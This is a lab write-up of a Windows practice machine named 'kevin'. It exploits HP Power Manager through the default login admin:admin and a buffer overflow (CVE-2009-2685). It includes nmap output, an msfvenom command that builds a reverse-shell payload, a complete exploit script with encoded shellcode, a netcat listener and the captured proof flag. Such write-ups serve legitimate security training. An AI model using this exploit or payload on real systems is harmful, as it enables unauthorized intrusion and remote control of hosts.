kevin - writeup - ROOT - Konstantinovitz

## Enum ``` PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 125 GoAhead WebServer | http-methods: |_ Supported Methods: GET HEAD | http-title: HP Power Manager |_Requested resource was http://192.168.188.45/index.asp |_http-server-header: GoAhead-Webs 135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP) 3389/tcp open ssl/ms-wbt-server? syn-ack ttl 125 |_ssl-date: 2025-04-25T17:45:49+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=kevin | Issuer: commonName=kevin | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2025-04-24T17:38:22 | Not valid after: 2025-10-24T17:38:22 | MD5: 1dabab52c6a9826cb055632101c13807 | SHA-1: 4bfdeda941de4e30e1b8ce452fe1424e13a7fdbd 3573/tcp open tag-ups-1? syn-ack ttl 125 49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC 49155/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC 49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC 49160/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-os-discovery: | OS: Windows 7 Ultimate N 7600 (Windows 7 Ultimate N 6.1) | OS CPE: cpe:/o:microsoft:windows_7::- | Computer name: kevin | NetBIOS computer name: KEVIN\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2025-04-25T10:45:41-07:00 | nbstat: NetBIOS name: KEVIN, NetBIOS user: <unknown>, NetBIOS MAC: 0050569ed060 (VMware) | Names: | KEVIN<00> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1e> Flags: <group><active> | KEVIN<20> Flags: <unique><active> | WORKGROUP<1d> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | Statistics: | 0050569ed0600000000000000000000000 | 0000000000000000000000000000000000 |_ 0000000000000000000000000000 | smb2-security-mode: | 210: |_ Message signing enabled but not required | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-04-25T17:45:41 |_ start_date: 2025-04-25T17:39:14 |_clock-skew: mean: 1h45m00s, deviation: 3h30m00s, median: 0s ``` ### 445 SMB - null auth - permitted - can not list shares ### 80 HTTP - HP Power http://192.168.188.45/Contents/index.asp - default credentials - `admin:admin` yields instant access ![[Pasted image 20250425194743.png]] - service version: `4.2` (Build 7) ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/kevin]-[192.168.188.45] ╰─> searchsploit "hp power manager" ------------------------------------------------------------------------ --------------------------------- Exploit Title | Path ------------------------------------------------------------------------ --------------------------------- Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information | php/webapps/23163.txt Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overf | windows/remote/16785.rb Hewlett-Packard (HP) Power Manager Administration Power Manager Adminis | windows/remote/10099.py HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metaspl | cgi/remote/18015.rb ------------------------------------------------------------------------ --------------------------------- Shellcodes: No Results Papers: No Results ``` I dunno, googling above mentioned build this reveals the a couple buffer overflows: ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/kevin]-[192.168.188.45] ╰─> searchsploit -m 10099 Exploit: Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow URL: https://www.exploit-db.com/exploits/10099 Path: /opt/exploitdb/exploits/windows/remote/10099.py Codes: CVE-2009-2685 Verified: True File Type: Python script, ASCII text executable Copied to: /targets/kevin/10099.py ``` We'll go about generating the payload for the exploit ```sh msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.231 LPORT=3573 -f python -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e x86/alpha_mixed ``` And paste that stuff in. where appropriate: ```python #!/usr/bin/python # HP Power Manager Administration Universal SHELLfer Overflow Exploit # CVE 2009-2685 # Tested on Win2k3 Ent SP2 English, Win XP Sp2 English # Matteo Memelli ryujin __A-T__ offensive-security.com # www.offensive-security.com # Spaghetti & Pwnsauce - 07/11/2009 # # ryujin@bt:~$ ./hppowermanager.py 172.16.30.203 # HP Power Manager Administration Universal SHELLfer Overflow Exploit # ryujin __A-T__ offensive-security.com # [+] Sending evil SHELLfer... # HTTP/1.0 200 OK # [+] Done! # [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell # ryujin@bt:~$ nc -v 172.16.30.203 4444 # 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out # (UNKNOWN) [172.16.30.203] 4444 (?) open # Microsoft Windows [Version 5.2.3790] # (C) Copyright 1985-2003 Microsoft Corp. # C:\WINDOWS\system32> import sys from socket import * print "HP Power Manager Administration Universal SHELLfer Overflow Exploit" print "ryujin __A-T__ offensive-security.com" try: HOST = sys.argv[1] except IndexError: print "Usage: %s HOST" % sys.argv[0] sys.exit() PORT = 80 RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll # [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes # badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" SHELL = "n00bn00b" SHELL += b"\x89\xe6\xda\xc5\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a" SHELL += b"\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43" SHELL += b"\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41" SHELL += b"\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42" SHELL += b"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59" SHELL += b"\x6c\x48\x68\x6c\x42\x37\x70\x33\x30\x35\x50\x75" SHELL += b"\x30\x6b\x39\x4a\x45\x64\x71\x4f\x30\x42\x44\x6c" SHELL += b"\x4b\x46\x30\x56\x50\x6e\x6b\x50\x52\x74\x4c\x4c" SHELL += b"\x4b\x53\x62\x47\x64\x4c\x4b\x70\x72\x47\x58\x66" SHELL += b"\x6f\x38\x37\x70\x4a\x36\x46\x34\x71\x6b\x4f\x4c" SHELL += b"\x6c\x55\x6c\x75\x31\x43\x4c\x36\x62\x66\x4c\x57" SHELL += b"\x50\x6b\x71\x78\x4f\x76\x6d\x75\x51\x4a\x67\x4b" SHELL += b"\x52\x38\x72\x76\x32\x56\x37\x4e\x6b\x32\x72\x32" SHELL += b"\x30\x4c\x4b\x73\x7a\x47\x4c\x4e\x6b\x70\x4c\x62" SHELL += b"\x31\x72\x58\x6a\x43\x47\x38\x55\x51\x38\x51\x33" SHELL += b"\x61\x6c\x4b\x30\x59\x61\x30\x37\x71\x5a\x73\x6c" SHELL += b"\x4b\x51\x59\x75\x48\x5a\x43\x74\x7a\x70\x49\x6c" SHELL += b"\x4b\x70\x34\x6c\x4b\x65\x51\x39\x46\x64\x71\x4b" SHELL += b"\x4f\x6e\x4c\x59\x51\x4a\x6f\x66\x6d\x33\x31\x6f" SHELL += b"\x37\x47\x48\x49\x70\x72\x55\x6a\x56\x43\x33\x73" SHELL += b"\x4d\x4b\x48\x47\x4b\x53\x4d\x46\x44\x44\x35\x58" SHELL += b"\x64\x51\x48\x4c\x4b\x56\x38\x34\x64\x53\x31\x59" SHELL += b"\x43\x31\x76\x4e\x6b\x44\x4c\x50\x4b\x4c\x4b\x51" SHELL += b"\x48\x47\x6c\x77\x71\x39\x43\x6e\x6b\x53\x34\x4e" SHELL += b"\x6b\x36\x61\x78\x50\x4d\x59\x50\x44\x45\x74\x31" SHELL += b"\x34\x71\x4b\x51\x4b\x53\x51\x32\x79\x62\x7a\x43" SHELL += b"\x61\x59\x6f\x39\x70\x53\x6f\x53\x6f\x33\x6a\x4e" SHELL += b"\x6b\x74\x52\x78\x6b\x4c\x4d\x61\x4d\x32\x48\x70" SHELL += b"\x33\x67\x42\x53\x30\x75\x50\x53\x58\x72\x57\x33" SHELL += b"\x43\x74\x72\x73\x6f\x42\x74\x72\x48\x50\x4c\x50" SHELL += b"\x77\x64\x66\x57\x77\x6b\x4f\x68\x55\x4e\x58\x7a" SHELL += b"\x30\x63\x31\x57\x70\x33\x30\x31\x39\x58\x44\x33" SHELL += b"\x64\x52\x70\x43\x58\x37\x59\x4b\x30\x62\x4b\x33" SHELL += b"\x30\x39\x6f\x69\x45\x72\x70\x52\x70\x76\x30\x46" SHELL += b"\x30\x67\x30\x56\x30\x67\x30\x72\x70\x61\x78\x39" SHELL += b"\x7a\x34\x4f\x39\x4f\x4d\x30\x69\x6f\x39\x45\x6c" SHELL += b"\x57\x61\x7a\x66\x65\x70\x68\x6f\x30\x6f\x58\x76" SHELL += b"\x4d\x58\x67\x30\x68\x47\x72\x45\x50\x54\x4d\x4b" SHELL += b"\x45\x6e\x69\x5a\x46\x72\x4a\x36\x70\x63\x66\x52" SHELL += b"\x77\x70\x68\x4e\x79\x59\x35\x30\x74\x50\x61\x6b" SHELL += b"\x4f\x59\x45\x4e\x65\x4b\x70\x53\x44\x66\x6c\x4b" SHELL += b"\x4f\x72\x6e\x66\x68\x70\x75\x4a\x4c\x35\x38\x38" SHELL += b"\x70\x6c\x75\x6f\x52\x32\x76\x59\x6f\x4b\x65\x50" SHELL += b"\x68\x63\x53\x50\x6d\x71\x74\x37\x70\x4e\x69\x7a" SHELL += b"\x43\x71\x47\x42\x77\x73\x67\x74\x71\x4b\x46\x43" SHELL += b"\x5a\x64\x52\x62\x79\x31\x46\x49\x72\x79\x6d\x70" SHELL += b"\x66\x5a\x67\x77\x34\x36\x44\x35\x6c\x47\x71\x67" SHELL += b"\x71\x4e\x6d\x70\x44\x46\x44\x36\x70\x4f\x36\x53" SHELL += b"\x30\x50\x44\x51\x44\x30\x50\x33\x66\x72\x76\x36" SHELL += b"\x36\x50\x46\x61\x46\x30\x4e\x62\x76\x70\x56\x36" SHELL += b"\x33\x46\x36\x35\x38\x33\x49\x78\x4c\x77\x4f\x4f" SHELL += b"\x76\x6b\x4f\x49\x45\x6c\x49\x79\x70\x50\x4e\x71" SHELL += b"\x46\x70\x46\x49\x6f\x30\x30\x45\x38\x64\x48\x6d" SHELL += b"\x57\x77\x6d\x33\x50\x79\x6f\x68\x55\x6d\x6b\x58" SHELL += b"\x70\x78\x35\x79\x32\x63\x66\x32\x48\x4e\x46\x6e" SHELL += b"\x75\x4f\x4d\x6d\x4d\x79\x6f\x49\x45\x55\x6c\x45" SHELL += b"\x56\x31\x6c\x45\x5a\x6f\x70\x79\x6b\x79\x70\x42" SHELL += b"\x55\x37\x75\x6d\x6b\x42\x67\x65\x43\x71\x62\x50" SHELL += b"\x6f\x61\x7a\x37\x70\x72\x73\x59\x6f\x79\x45\x41" SHELL += b"\x41" ... ``` Start a handler: ```sh rlwrap nc -lnvp 3573 ``` We get a shell, but there's no flag lol.... ## Privesc Okay this one was rather easy.... ``` PS C:\Users\kevin\Desktop> whoami nt authority\system PS C:\Users\kevin\Desktop> cd /users/administrator PS C:\users\administrator> dir Directory: C:\users\administrator Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r-- 3/5/2010 12:26 AM Contacts d-r-- 7/9/2020 7:24 PM Desktop d-r-- 3/5/2010 12:26 AM Documents d-r-- 3/5/2010 12:26 AM Downloads d-r-- 3/5/2010 12:26 AM Favorites d-r-- 3/5/2010 12:26 AM Links d-r-- 3/5/2010 12:26 AM Music d-r-- 3/5/2010 12:26 AM Pictures d-r-- 3/5/2010 12:26 AM Saved Games d-r-- 3/5/2010 12:26 AM Searches d-r-- 3/5/2010 12:26 AM Videos PS C:\users\administrator> cd Desktop PS C:\users\administrator\Desktop> ls Directory: C:\users\administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 4/25/2025 11:40 AM 34 proof.txt PS C:\users\administrator\Desktop> cat proof.txt 0994a6b78e20067cf0e1379a8e36e145 PS C:\users\administrator\Desktop> ``` Done I suppose....